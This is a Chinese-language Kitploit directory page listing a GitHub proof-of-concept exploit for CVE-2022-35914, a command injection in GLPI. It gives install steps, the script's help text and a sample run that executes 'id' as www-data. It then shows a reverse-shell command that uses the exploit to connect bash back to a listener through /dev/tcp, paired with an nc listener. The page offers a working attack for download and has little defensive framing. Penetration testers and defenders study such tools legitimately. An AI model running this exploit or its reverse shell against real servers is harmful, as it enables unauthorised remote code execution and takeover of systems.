Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-35914 — GLPI 的 PoC 漏洞利用 - 使用第三方库脚本进行的命令注入 | Kitploit
工具/GitHubGitHub/senderend/cve-2022-35914
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubsenderend/cve-2022-35914

CVE-2022-35914

GLPI 的 PoC 漏洞利用 - 使用第三方库脚本进行的命令注入

查看仓库
431年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-35914 PoC

参考资料

  • https://github.com/glpi-project/glpi/security/advisories/GHSA-c5gx-789q-5pcr
  • https://github.com/cosad3s/CVE-2022-35914-poc(感谢 Sébastien Copin 提供的 PoC,我在此进行了改编)

在此查看我的完整文章:https://link.medium.com/tBwDlpQl3Ib

用法

root@kitploit:~
pip install -r requirements.txt
root@kitploit:~
python3 CVE-2022-35914.py -h
usage: CVE-2022-35914.py [-h] -u URL [-c CMD] [-f HOOK] [-b CALLBACK] [--check] [--user-agent USER_AGENT]

CVE-2022-35914 - GLPI - Command injection using a third-party library script

options:
  -h, --help                  show this help message and exit
  -u URL                      URL to test
  -c CMD                      Command to launch (default: id)
  -f HOOK                     PHP hook function (default: array_map)
  -b CALLBACK                 PHP callback function (default: system)
  --check                     Just check, no command execution.
  --user-agent USER_AGENT     Custom User-Agent

示例:

root@kitploit:~
python3 CVE-2022-35914.py -u http://glpi

uid=33(www-data) gid=33(www-data) groups=33(www-data)

反弹 Shell:

root@kitploit:~
python3 CVE-2022-35914.py -u http://192.168.249.242 -c 'bash -c "bash -i >& /dev/tcp/192.168.45.154/80 0>&1"'

nc -lvnp 80
下载工具